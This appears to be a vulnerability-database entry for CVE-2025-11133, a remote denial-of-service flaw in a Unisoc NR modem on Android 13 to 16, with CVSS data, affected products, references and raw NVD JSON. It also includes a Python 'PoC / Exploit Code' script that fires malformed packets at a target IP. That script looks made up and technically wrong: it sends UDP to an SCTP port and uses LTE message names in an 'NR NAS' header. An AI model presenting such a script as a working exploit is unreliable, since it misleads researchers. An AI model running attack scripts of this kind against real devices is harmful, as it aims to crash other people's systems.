CVE-2025-11133

Description

In nr modem, there is a possible system crash due to improper input validation. This could lead to remote denial of service with no additional execution privileges needed

CVSS Details

CVSS Score

7.5

Severity

HIGH

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

Configurations (Affected Products)

cpe:2.3:o:google:android:13.0:*:*:*:*:*:*:* - VULNERABLE

cpe:2.3:o:google:android:14.0:*:*:*:*:*:*:* - VULNERABLE

cpe:2.3:o:google:android:15.0:*:*:*:*:*:*:* - VULNERABLE

cpe:2.3:o:google:android:16.0:*:*:*:*:*:*:* - VULNERABLE

cpe:2.3:h:unisoc:t8100:-:*:*:*:*:*:*:* - NOT VULNERABLE

cpe:2.3:h:unisoc:t8200:-:*:*:*:*:*:*:* - NOT VULNERABLE

cpe:2.3:h:unisoc:t8300:-:*:*:*:*:*:*:* - NOT VULNERABLE

cpe:2.3:h:unisoc:t9100:-:*:*:*:*:*:*:* - NOT VULNERABLE

Unisoc NR Modem (版本信息需参考厂商公告)

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

#!/usr/bin/env python3
# CVE-2025-11133 PoC - Unisoc NR Modem Denial of Service
# This PoC demonstrates sending malformed NR protocol messages
# Note: Actual exploitation requires specialized NR protocol knowledge and radio equipment

import socket
import struct
import sys

def create_nr_nas_message(msg_type, payload):
    """Create a malformed NR NAS message for testing"""
    # NAS message header
    eps_mobile_id = 0x01
    nas_header = bytes([
        0x00,  # Protocol discriminator
        msg_type,
        eps_mobile_id
    ])
    
    # Malformed payload with invalid length fields
    malformed_payload = payload + b'\x00' * 256
    
    return nas_header + malformed_payload

def send_malformed_nr_packet(target_ip, target_port=38412):
    """Send malformed NR packet to trigger vulnerability"""
    try:
        sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
        sock.settimeout(5)
        
        # Create various malformed NR messages
        test_messages = [
            create_nr_nas_message(0x01, b'\xFF' * 100),  # TAU request
            create_nr_nas_message(0x02, b'\x00' * 200),  # Service request
            create_nr_nas_message(0x03, b'\xAA' * 150),  # Attach request
        ]
        
        for msg in test_messages:
            print(f"[*] Sending malformed NR message ({len(msg)} bytes)...")
            sock.sendto(msg, (target_ip, target_port))
            
        sock.close()
        print("[+] Malformed packets sent successfully")
        return True
        
    except Exception as e:
        print(f"[-] Error: {e}")
        return False

if __name__ == "__main__":
    if len(sys.argv) < 2:
        print("Usage: python3 cve_2025_11133_poc.py <target_ip>")
        sys.exit(1)
    
    target = sys.argv[1]
    print(f"[*] CVE-2025-11133 PoC - Targeting {target}")
    send_malformed_nr_packet(target)

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2025-11133
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2025-11133
[3] CVE Details https://www.cvedetails.com/cve/CVE-2025-11133/
[4] VulDB https://vuldb.com/cve/CVE-2025-11133
[5] https://www.unisoc.com/en/support/announcement/1995394837938163714

Raw JSON Data

JSON

{"cve": {"id": "CVE-2025-11133", "sourceIdentifier": "[email protected]", "published": "2025-12-01T08:15:47.510", "lastModified": "2025-12-02T15:53:06.533", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "In nr modem, there is a possible system crash due to improper input validation. This could lead to remote denial of service with no additional execution privileges needed"}, {"lang": "es", "value": "En el módem nr, existe una posible caída del sistema debido a una validación de entrada inadecuada. Esto podría conducir a una denegación de servicio remota sin necesidad de privilegios de ejecución adicionales."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "NVD-CWE-noinfo"}]}], "configurations": [{"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:google:android:13.0:*:*:*:*:*:*:*", "matchCriteriaId": "879FFD0C-9B38-4CAA-B057-1086D794D469"}, {"vulnerable": true, "criteria": "cpe:2.3:o:google:android:14.0:*:*:*:*:*:*:*", "matchCriteriaId": "2700BCC5-634D-4EC6-AB67-5B678D5F951D"}, {"vulnerable": true, "criteria": "cpe:2.3:o:google:android:15.0:*:*:*:*:*:*:*", "matchCriteriaId": "8538774C-906D-4B03-A3E7-FA7A55E0DA9E"}, {"vulnerable": true, "criteria": "cpe:2.3:o:google:android:16.0:*:*:*:*:*:*:*", "matchCriteriaId": "2D49E611-5D53-479D-A981-42388FDC0E8D"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:h:unisoc:t8100:-:*:*:*:*:*:*:*", "matchCriteriaId": "F2DA04F2-5351-4043-A330-5397E627A222"}, {"vulnerable": false, "criteria": "cpe:2.3:h:unisoc:t8200:-:*:*:*:*:*:*:*", "matchCriteriaId": "FC033D2C-ED1A-4EAB-A77B-8E1C88C74B0A"}, {"vulnerable": false, "criteria": "cpe:2.3:h:unisoc:t8300:-:*:*:*:*:*:*:*", "matchCriteriaId": "DC7743D5-B187-48D4-BC77-D8DCDF263166"}, {"vulnerable": false, "criteria": "cpe:2.3:h:unisoc:t9100:-:*:*:*:*:*:*:*", "matchCriteriaId": "9D1F3B9D-142F-4E70-8477-E26D921EF19A"}]}]}], "references": [{"url": "https://www.unisoc.com/en/support/announcement/1995394837938163714", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}